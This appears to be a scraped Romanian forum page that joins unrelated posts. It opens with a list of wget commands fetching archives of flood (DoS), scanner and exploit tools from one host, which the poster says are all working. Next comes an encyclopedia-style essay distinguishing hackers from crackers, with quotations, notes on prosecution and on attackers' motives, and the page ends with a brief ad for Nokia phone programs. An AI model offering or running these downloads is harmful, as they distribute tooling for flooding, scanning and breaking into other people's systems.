wget pibo.com/.x/flood/ALLflood.tar
wget pibo.com/.x/flood/udp.tar
wget pibo.com/.x/flood/juno.tar
wget pibo.com/.x/scan/access.tar
wget pibo.com/.x/scan/revenge.tar
wget pibo.com/.x/scan/john.tar.gz
wget pibo.com/.x/scan/Imperiu.gz
wget pibo.com/.x/scan/linuxteam.tar
wget pibo.com/.x/scan/go.tar
wget pibo.com/.x/exploit/2008.tar
wget pibo.com/.x/exploit/do.tar
wget pibo.com/.x/others/radio.tar
wget pibo.com/.x/others/bind.tar
Sunt toate active. Cel putin la data la care le-am pus... :hi:
20.10.2009
21.4KB
Ce sunt hackerii
Există o opinie conform căreia hackerii sunt pasionaţi ai informaticii, care, de obicei au ca scop „spargerea” unor sisteme informatice. În această enciclopedie trebuie să lămurim bine termenii pe care îi folosim. Hacker este:
- (în vernacular) cel care sparge/se infiltrează în calculatoarele altora (atenţie: cuvântul corect pentru asta este cracker, sau sinonimul său „pălărie neagră”). Acest cuvânt provine de la ocupaţia favorită a crackerilor şi anume de a sparge parole. Se poate vorbi atât de crackeri care sparg programe shareware sau altfel de software sau media protejate, cât şi de crackeri care sparg calculatoare şi obţin accesul la informaţii confidenţiale (de exemplu numărul cărţii dumneavoastră de credit), sau virusează calculatorul altora (de exemplu, pentru a-l folosi drept fabrică de spam sau a găzdui pornografie, de obicei ilegală, în scop de câştig comercial); sinonime: spărgător de programe şi/sau spărgător de calculatoare;
- există o variantă de crackeri-hackeri care sparg sisteme informatice doar pentru a demonstra existenţa unor vulnerabiltăţi în sistem, pe urmă comunicând proprietarilor/producătorilor sistemelor existenţa acestor exploituri şi modul în care se pot proteja de astfel de atacuri (ei sunt numiţi crackeri etici sau hackeri etici). Ei pot fi numiţi şi pălării albe (în limba engleză, „white hats”). Prin urmare, hacker etic este cineva care poate intra într-un sistem informatic pe alte căi decât cele oficiale, pentru a demonstra existenţa unor probleme de securitate şi eventual a le remedia/elimina. Câteva exemple, chiar din România sunt (în ordine alfabetică): Alien Hackers, HackersBlog şi Sysboard.
- (super)experţi în tehnologii software şi/sau hardware;
- hobbyişti care trec peste graniţele aparente existente în diverse dispozitive hardware şi/sau în diverse programe de calculator.
Ziarele americane au publicat sumedenie de articole care spuneau „Cutare hacker a spart cutare sistem informatic”, însemnând de fapt „Cutare expert în calculatoare a spart cutare sistem informatic”. Folosirea termenului este corectă, căci dacă oamenii respectivi n-ar fi fost experţi în calculatoare, nu ar fi putut sparge astfel de sisteme (pe atunci nu apăruseră haxorii, adică crackeri care nu se pricep la programare şi utilizează pentru spart programele făcute de alţii). Dar asocierea cuvântului hacker (expert în calculatoare) cu operaţiuni imorale şi/sau ilegale este doar „între urechile” publicului larg, care a citit astfel de articole, şi a ramas cu impresia greşită (prejudecata, stereotipul) că hackerii (în general) ar fi nişte infractori.
Se mai pot deosebi următoarele sensuri specializate (din subcultura informaticienilor) ale cuvântului hacker:
- cineva care cunoaşte foarte bine un limbaj de programare sau mediu de programare, astfel încât poate scrie un program fără niciun efort aparent;
- cineva care inventează, proiectează, dezvoltă, implementează, testează sau îmbunătăţeşte o tehnologie;
- cineva care oferă soluţii neconvenţionale dar adecvate împotriva exploiturilor, erorilor şi ale unor alt fel de probleme, cu ajutorul mijloacelor disponibile.
Că a fi hacker sau cracker sunt două lucruri diferite, o arată hackerii Steve Gibson şi Eric Steven Raymond. Gibson spune:
„Vreau să consacru acest moment pentru a-mi demonstra recunoştinţa pentru enorma influenţă pe care munca altruistă a comunităţii mondiale de hackeri a avut-o asupra cunoaşterii pe care am dobândit-o. Ei nu sunt «crackerii» maliţioşi şi nici «script-kiddies» care sparg, fură, strâmbă şi distrug, abuzând astfel de cunoaşterea pe care au dobândit-o de la alţii, ci ei sunt adevăraţii hackeri - în înţelesul originar al termenului - care râvnesc la cunoaştere, pricepere şi putere tehnologică pentru valoarea lor intrinsecă.”
E.S. Raymond spune în ghidul pentru cei care vor să devină hackeri:
„Hackerii adevăraţi îi numesc «crackeri» şi nu vor să aibă de a face cu astfel de oameni. Hackerii adevăraţi îi consideră pe crackeri drept leneşi, iresponsabili şi nu foarte deştepţi, reproşându-le că a fi în stare să spargi o protecţie te face la fel de hacker pe cât a porni un automobil prin efracţie te face inginer. ... Diferenţa esenţială este: hackerii construiesc, crackerii distrug. Dacă vrei să devii hacker, citeşte în continuare. Dacă vrei să devii cracker, citeşte grupul de Usenet news://alt.2600 şi pregăteşte-te să faci de la cinci la zece ani de pârnaie din momentul în care afli că nu erai aşa deştept pe cât te credeai. Asta e tot ce am avut de spus despre crackeri.”
Într-o prelegere la Universitatea din Amsterdam, Wynsen Faber, de la Faber organisatievernieuwing (birou de consultanţă care evaluează activitatea unor servicii poliţieneşti din Olanda) a afirmat că infracţiunile informatice sunt printre cele mai uşor de urmărit penal. Gradul de complexitate al urmăririi penale a unei infracţiuni informatice nu se ridică nici pe departe la gradul de complexitate al unei investigaţii în ce priveşte clasicul omor. El a afirmat că tot ce trebuie pentru asta sunt nişte informaticieni buni în cadrul poliţiei şi cooperare poliţienească internaţională în caz că s-a acţionat din alte ţări. Se consultă logurile, se trasează IP-ul, se iau datele personale de la provider, este arestat suspectul şi pus să dea declaraţie că în ziua... la ora... a spart un anume calculator sau a pus un troian pe un sit de phishing.
Dacă mulţi infractori informatici nu sunt prinşi este din cauză că Poliţia nu iroseşte banii contribuabililor pentru orice găinării. Conform lui Steve Gibson, costul unei investigaţii FBI asupra unei infracţiuni informatice se ridică la USD 200000, ceea ce face FBI-ul să urmărească doar infracţiunile informatice foarte grave; dacă dauna este sub USD 5000 se consideră că nu s-a comis nicio infracţiune. În schimb, costurile procesului Ministerului Public olandez contra lui Holleeder (un infractor clasic) au fost estimate la cel puţin 70 de milioane de Euro.
Motivaţiile tipice pentru spărgătorii de calculatoare sunt: bani, distracţie, ego, cauză social-politică (activism), admitere într-un anume grup social şi obţinerea unui statut social. Banii pot fi obţinuţi de exemplu prin a afla numere de cărţi de credit sau prin şantajarea unor firme, ameninţate cu blocarea sitului lor de internet. Distracţie înseamnă că motivaţia de a sparge sisteme informatice nu este cea de a produce daune, ci instinctul de joc al lui Homo ludens, adică comportamentul jucăuş şi de a face glume. Ego: motivaţia constă în satisfacţia datorată învingerii unor bariere hard/soft prin creativitate informatică. Căuzaşii (hacktiviştii) se folosesc de puterea pe care spargerea de calculatoare le-o conferă pentru a promova cauza în care cred cu tărie (drepturile omului, drepturile animalelor, adoptarea Sharia, etc.). Intrarea în grupul social al hackerilor este determinată de merite dovedite în activitatea proprie ca hacker, ageamii nefiind admişi în astfel de cercuri. Statutul social în ciberspaţiu poate fi obţinut prin a comunica altora experienţa obţinută de hacker, făcând astfel dovada priceperii proprii, şi a înainta prin astfel astfel de conversaţii şi contribuţii în ierarhia socială a diverselor canale IRC pe care discută hackerii.
Note
1. ^ Sterling, Bruce . “Part 2(d)”, The Hacker Crackdown, McLean, Virginia: IndyPublish.com. ISBN 1-4043-0641-2.
2. ^ (2008) Oxford English Dictionary, Oxford University Press. „black hat n. colloq. (orig. U.S.) (a) a villain or criminal, esp. one in a film or other work of fiction; a ‘bad guy’; (b) Computing slang a person who engages in illegal or malicious hacking, creates or distributes computer viruses, etc.”
3. ^ The Jargon File, version 4.4.7.
4. ^ Internet Users' Glossary (Request for Comments 1392), January 1993
5. ^ Williams, Sam (2002). “Appendix B”, Free as in Freedom. Richard Stallman's Crusade for Free Software. (în limba engleză), Sebastopol, CA: O'Reilly. URL accesat la 5 septembrie 2009. „When police and businesses began tracing computer-related crimes back to a few renegade programmers who cited convenient portions of the hacking ethic in defense of their activities, the word "hacker" began appearing in newspapers and magazine stories in a negative light. Although books like Hackers did much to document the original spirit of exploration that gave rise to the hacking culture, for most news reporters, "computer hacker" became a synonym for "electronic burglar."” Cf. The History of Hacking. Documentary. Discovery Channel.
6. ^ Gibson (2005).
7. ^ Raymond (2008:„What Is a hacker?”).
8. ^ Gibson (2002a:12).
9. ^ Loc. cit.
10. ^ Kilger, Arkin şi Stutzman (2004:509-519).
11. ^ Loc. cit.
12. ^ Loc. cit.
13. ^ Loc. cit.
14. ^ Loc. cit.
15. ^ Loc. cit.
16. ^ Loc. cit.
Adus de la
:hi: :nod:
01.10.2009
17.3KB
37 de programe pentru Nokia (antivirus,ultra mp3,converter dvix to 3gp,vboy si altele.
Tested by Kaspersky Anti-Virus
:nod: